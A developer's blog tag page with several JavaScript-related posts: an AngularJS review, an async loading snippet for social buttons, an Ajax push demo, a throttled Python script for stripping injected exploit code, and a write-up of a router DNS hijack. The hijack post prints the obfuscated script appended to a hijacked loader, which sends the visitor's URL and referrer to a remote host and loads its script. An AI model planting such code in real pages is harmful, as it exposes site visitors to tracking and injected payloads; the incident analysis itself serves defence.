Posts Tagged ‘javascript’

AngularJS – a first step

Wednesday, September 19th, 2012

If you’ve not heard of AngularJS, I’m not surprised. It moves MVC or MV* to the browser and provides a unique, lightweight, powerful way to write apps that execute on the client side. Forms, validation, controllers, routes are all handled fairly easily.

The one thing I look for in every framework I use is a decent form library. No form library, and my interest wanes quickly. I don’t know how frameworks can claim to speed up development if you have to hand code forms, do your own validation and handle the form submission. It isn’t like you don’t expect people to input data.

The first thing I ran into with AngularJS was the markup. While most frameworks have a template language that is executed before presentation, AngularJS's markup is written directly in the HTML. The one thing that seems missing is the ability to do conditionals in templates. That was a design choice, and a decent one to stand firm on, but working around it to make a dynamic menu was a little complicated.

Passing things to your $scope allows you to communicate from your controller to the page. When using a controller, your URLs look like http://site.com/#/page, but, if you view source, the page looks rather barren. I know Google's searchbots can crawl the site, as they did about eight minutes after I created it.

There are a number of demos and videos and watching them gives you a fairly complete overview of AngularJS.

Development was quick. I spent a total of three days writing a quick app to familiarize myself with it. Overall, the documentation is excellent and the examples are pretty good, covering a wide variety of use cases. There is a learning curve, but the documentation is written very well, explaining the why in addition to documenting the functionality.

To reconcile sequential logic with JavaScript's asynchronous behavior, AngularJS provides $q, a promise library that works well with services. In your controller, you ask for a promise and hand it off to your service, which resolves it; your controller continues at that point, modifying the DOM on your page and allowing for a very dynamic site.
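That flow can be sketched with a standard Promise standing in for Angular's $q (the function names below are illustrative, not Angular APIs; in 2012 you would use $q.defer() since browsers had no native Promise):

```javascript
// A "service" that performs async work and resolves a promise with the
// result.  In AngularJS you would use $q.defer() (or return $http's
// promise); a standard Promise stands in for $q here.
function fetchGreeting(name) {
  return new Promise(function (resolve) {
    // Simulate an async call, e.g. an $http request.
    setTimeout(function () {
      resolve("Hello, " + name);
    }, 0);
  });
}

// The "controller" asks the service for the promise and continues when
// it resolves -- this is where you would update $scope and the DOM.
fetchGreeting("AngularJS").then(function (greeting) {
  console.log(greeting); // prints "Hello, AngularJS"
});
```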

Form handling is superb. Validation of fields can be handled quickly and you can even specify regexes in the HTML for extremely tight validation. Once you’ve received the data, your controller can act on that data.
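As a sketch of putting a regex right in the markup with AngularJS's ng-pattern directive (form and field names here are illustrative):

```html
<form name="signup" novalidate>
  <!-- ng-pattern takes a regex; the field is invalid unless it matches -->
  <input type="text" name="zip" ng-model="zip"
         required ng-pattern="/^\d{5}$/" />
  <span ng-show="signup.zip.$error.pattern">Invalid ZIP code</span>
  <button ng-disabled="signup.$invalid">Submit</button>
</form>
```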

Controllers and routes initially caught me off guard. When I first looked at them, I missed the ng-app specification and had to remove a controller declaration on a div left over from a prior iteration. Once I did that, and understood how partials worked, my app became a multi-page app.
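The wiring is compact; a sketch of the route configuration from that era of AngularJS (module, controller and partial names are illustrative):

```javascript
// Minimal routing sketch for AngularJS 1.0-era apps.  With ng-app="app"
// on the html tag and an ng-view element in the page, visiting #/page
// swaps in the matching partial and controller.
function HomeCtrl($scope) { $scope.title = 'Home'; }
function PageCtrl($scope) { $scope.title = 'Page'; }

angular.module('app', []).config(function ($routeProvider) {
  $routeProvider
    .when('/',     { templateUrl: 'partials/home.html', controller: HomeCtrl })
    .when('/page', { templateUrl: 'partials/page.html', controller: PageCtrl })
    .otherwise({ redirectTo: '/' });
});
```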

I didn't do much DOM manipulation, but AngularJS has quite a few powerful methods that make it easy. Selecting and modifying DOM elements is quick, and, with a service/controller setup, you can simply push changes through to the scope and they'll be reflected on the page.

Overall, my first experience with AngularJS is a positive one.

The first app I wrote was StravaPerf, which uses the Strava API and d3.js to display graphs showing rider improvement. While Strava's API is quite robust, I've run into its rate limits in the past, so I use Varnish both to work around the fact that JSONP isn't supported and to cache the JSON responses coming back from Strava. This eliminates the need for any backend or persistent storage. As a result, the app runs almost entirely from Varnish and only hits the backend on a cold start.
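The Varnish side can be as simple as pointing a backend at the API and giving responses a TTL. A rough sketch in Varnish 3-era VCL (hostname, port and TTL are illustrative, and this assumes the app and the cached API are served from the same origin so JSONP isn't needed):

```vcl
backend strava {
    .host = "www.strava.com";
    .port = "80";
}

sub vcl_recv {
    set req.backend = strava;
}

sub vcl_fetch {
    # Cache the JSON responses for an hour so repeated visitors
    # don't count against the API rate limit.
    set beresp.ttl = 1h;
}
```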

AngularJS is quite powerful and easy to use. I can see a number of potential projects that could easily be handled with it that would be extremely dynamic and interactive. This would push the edge of the web and allow app-like behavior in the browser.

A discussion of Web Site Performance – from a design perspective

Friday, March 23rd, 2012

One of the things I always run into is clients who want their site to be faster. Oftentimes, I'm told that it is the server or MySQL slowing the site down. Today, I had a conversation with a site owner who was talking about how slow their site was.

“The site loads the first post and sits there for five seconds, then the rest of the page comes in.”

Immediately, I think: a <script src=" include is likely the problem.

Load the page and, yes, it pauses… right where the social media buttons are loaded.

Successive reloads are better, but that one JavaScript include appears to always be fetched. It turns out the expire time on that JavaScript is set to a date in the past, so it is always fetched regardless of modifications. And that script doesn't load very quickly, adding to the delay.

Disable the plugin, reload, and the site is fast. The initial reaction is: let's move those includes to async JavaScript. Social media buttons don't need to hold up the page load – they can be rendered after the site has loaded. It might look a little funny, but most of the social media buttons are below the fold anyhow, and we're trying to get the site to display quickly.

There is a difference between the page being slow and the page rendering slowly. The latter is what most people see, and it is what they judge the site by. So, the first thing we need to do is load those scripts asynchronously. As an example, the social media buttons on this site are loaded by my cd34-social plugin.

But, the meat of the conversion to async is here:

<script type="text/javascript">
<!--
var scripts = [
  "https://apis.google.com/js/plusone.js",
  "http://platform.twitter.com/widgets.js",
  "http://connect.facebook.net/en_US/all.js#xfbml=1"
];
for (var i = 0; i < scripts.length; i++) {
  var s = document.createElement("script");
  s.type = "text/javascript";
  s.async = true;                 // don't block page rendering
  s.src = scripts[i];
  var first = document.getElementsByTagName("script")[0];
  first.parentNode.insertBefore(s, first);
}
// -->
</script>

What this code does is create a script element for each of https://apis.google.com/js/plusone.js, http://platform.twitter.com/widgets.js and http://connect.facebook.net/en_US/all.js#xfbml=1, mark it async so it doesn't block rendering, and insert it before the first script tag on the page.

This will make the social buttons load after the page has loaded, but, won’t hold up the page rendering.

However, this isn't the only issue we've run into. The plugin they used includes its own social media buttons. The plugin should use CSS sprites: one large image containing a bar or matrix of icons, where CSS positioning moves the image around so only a portion of it is displayed. This way, you fetch one image rather than the 16 social media buttons plus their 16 hover images.

Here is a collection of those sprites as used by Google, Facebook, Twitter and Twitter's Bootstrap template:

With these sprites, you save the overhead of multiple fetches for each icon, and, present a much quicker overall experience for the surfer.
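In CSS, the technique is just a shared background image plus a per-icon offset; a minimal sketch (class names, sizes and offsets are illustrative):

```css
/* One image holds all of the icons; each class only shifts the
   visible window.  Offsets depend on your sprite's layout. */
.icon {
  background-image: url(sprites.png);
  background-repeat: no-repeat;
  display: inline-block;
  width: 32px;
  height: 32px;
}
.icon-twitter  { background-position: 0 0; }
.icon-facebook { background-position: -32px 0; }
```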

Not everything can be solved with low latency webservers, some performance problems are on the browser/rendering side.

Ajax Push Engine, Pyramid and a quick demo application

Wednesday, January 11th, 2012

Earlier today I was debating Ajax Push and Pyramid for a project I had in mind. I ended up spending about 45 minutes writing a quick proof of concept, then, decided that perhaps something a bit more detailed with some documentation would be helpful for others.

I used Pyramid and APE and wrote a quick demo app. All of the code for the demo app can be downloaded from http://code.google.com/p/pyramid-ape-demo/.

In the html/ directory are the pages, graphics and JavaScript files required to run the client side of the app. In the ape_server/ directory is the JavaScript that needs to be installed in the APE server's scripts/ directory; you'll want to modify the password. Also included in the html/ directory is a Python script called push.py, which uses urllib2.urlopen to communicate with the server directly. And finally, in the ape/ directory is a very minimal Pyramid application; pyramidape.wsgi is also included as a starting point to get the site set up.

In the demo, the left-hand Coke can is controlled completely by the APE JavaScript client code; communication between the browser and the APE server is not processed by anything but APE. On the right-hand side, the Coke can is controlled by a JSON post to Pyramid; Pyramid then uses urllib2.urlopen to communicate with APE, which updates the page.

Changes made on the page are reflected in realtime for everyone currently viewing it. Since we're using Ajax push, the page doesn't need to be reloaded to show those changes. In this example, an img src and its alt text are changed along with a button, but you can write your script to modify any HTML on the page – changing the colors of the page, elements, etc.

Using Ajax push and long polling with Pyramid isn’t difficult and this simple demo and example code should be a good starting point.

Quick Python search and replace script

Friday, October 28th, 2011

We have a client machine that is a little loaded and has a ton of modified files. Normally we just restore from the last backup or the previous generation backup, but over 120k files have been exploited since June 2011. Since the machine is doing quite a bit of work, we need to throttle our replacements so that we don't kill the server.

#!/usr/bin/python
"""

Quick search and replace to replace an exploit on a client's site while
trying to keep the load disruption on the machine to a minimum.

Replace the variable exploit with the code to be replaced. By default,
this script starts at the current directory. While the one-minute load
average is above max_load, the script sleeps for thirty seconds before
continuing.

"""

import glob
import os
import re
import time

path = '.'
max_load = 10

exploit = """
<script>var i,y,x="3cblahblahblah3e";y='';for(i=0;i
""".strip()

file_exclude = re.compile('\.(gif|jpe?g|swf|css|js|flv|wmv|mp3|mp4|pdf|ico|png|zip)$', \
                          re.IGNORECASE)

def check_load():
    load_avg = int(os.getloadavg()[0])
    while load_avg > max_load:
        time.sleep(30)
        load_avg = int(os.getloadavg()[0])

def getdir(path):
    check_load()
    for entry in os.listdir(path):
        file_path = os.path.join(path, entry)
        if os.path.isdir(file_path):
            getdir(file_path)
        else:
            if not file_exclude.search(file_path):
                process_file(file_path)

def process_file(file_path):
    # Open read/write so the file can be rewritten in place.
    fh = open(file_path, 'r+')
    contents = fh.read()
    if exploit in contents:
        print 'fixing:', file_path
        contents = contents.replace(exploit, '')
        fh.truncate(0)
        fh.seek(0, os.SEEK_SET)
        fh.write(contents)
    fh.close()

getdir(path)

Thankfully, since this server is run as www-data rather than SetUID, the damage wasn’t as bad as it could have been.

Man in the Middle Attack

Sunday, October 10th, 2010

A few days ago, a client had a window open up in their browser with an IP address and a query-string parameter containing his domain name. He asked me if his WordPress site had been hacked. I took a look through the files on disk, dumped the database and did a grep, and looked around the site using Chrome, Firefox and Safari – and saw nothing. I even used Firefox to view the generated source, as scripts sometimes take advantage of the fact that jQuery is already loaded to pull in an extra payload through a template or addon.

Nothing. He runs a Mac; his wife was having the same issue. I recalled the issue with the recent Adobe Flash plugin, but then he said something that was very telling: our iPads do it too.

No Flash on the iPad, no way to install most toolbar code due to a fairly tight sandbox, and the same behavior across multiple machines. Even machines that weren't accessing his site were popping up windows/tabs in Safari.

I had him check the DNS settings under System Preferences, TCP/IP, and he read the numbers to me. The last one, 1.1.1.1, seemed odd, but wouldn't normally cause an issue since 1.0.0.0/8 isn't routed. The other two DNS server IPs were read off and written down. A reverse lookup on them resulted in Not Found. Since he was on Road Runner, I found that a bit odd, so I did a whois and found that both of the IP addresses listed as DNS servers were hosted in Russia.

Now we're getting somewhere. The settings on his machine were grabbed via DHCP, which meant his router was probably set to use those servers. Sure enough, we logged in with the default username/password of admin/password, looked at the first page, and there they were. We changed them to Google's resolvers and changed the password on the router to something a little more secure.

We checked a few settings in the Linksys router and remote web access wasn't enabled, so the only way it could have happened is a JavaScript exploit that logged into the router and made the changes. Now the fun began: figuring out what was actually being intercepted. Since I had a source site that I knew caused issues, some quick investigative work turned up a number of external URLs loaded on his site that might be common enough and small enough to be of interest. Since we know these particular scripts require jQuery, we can look at anything in his source that calls something external.

The first thought was the Twitter sidebar, but that calls Twitter directly, which means all of that traffic would have to be proxied – certainly not something you'd want to do with limited bandwidth. Feedburner seemed like a potential vector, but those were hrefs, so they would have had to be followed, and the Feedburner widget wasn't present. Bookmarklet.amplify.com seemed like a reasonable target, but the DNS for it through the Russian DNS servers and other resolvers was the same. That isn't to say they couldn't change it on a per-request basis to balance for traffic, but we're going on the assumption this is a fire-and-forget operation.

Looking further, statcounter could have been a suspect, but again the DNS entries appeared to be the same. It does fit the criteria, though: a small JavaScript on a page that likely has jQuery.

However, the next entry appeared to be a good candidate: cdn.wibiya.com, which requires jQuery and loads a small JavaScript. The DNS entries are different – we could attribute that to the fact it is a CDN, but we get a CNAME from Google's resolvers and an IN A record from the suspect DNS servers.
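That difference is easy to see from a shell; for example (the rogue resolver's address below is a placeholder, not the real one):

```shell
# Ask Google's public resolver and the suspect resolver for the same name,
# then compare the answers.
dig +short cdn.wibiya.com @8.8.8.8
dig +short cdn.wibiya.com @192.0.2.53   # rogue resolver (placeholder IP)
```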

The Loader.js contains a tiny bit of extra code at the bottom:

var xxxxxx_html = '';
    xxxxxx_html += '<scr ' + 'ipt language="JavaSc' + 'ript" ';
    xxxxxx_html += 'src="http://xx' + 'xxxx.ru/js.php?id=36274';
    xxxxxx_html += '&dd=3&url=' + encodeURIComponent(document.location);
    xxxxxx_html += '&ref=' + encodeURIComponent(document.referrer);
    xxxxxx_html += '&rnd=' + Math.random() + '"></scr>';
    document.write(xxxxxx_html);

I did a few checks to see if I could find any other hostnames they had intercepted, but a quick glance didn't turn up anything else. Oh, and these guys minified the JavaScript – even though Wibiya didn't. And no, the server hosting the content was in the USA; only the DNS server was outside the USA.

After years of reading about this type of attack, it is the first time I was able to witness it first-hand.
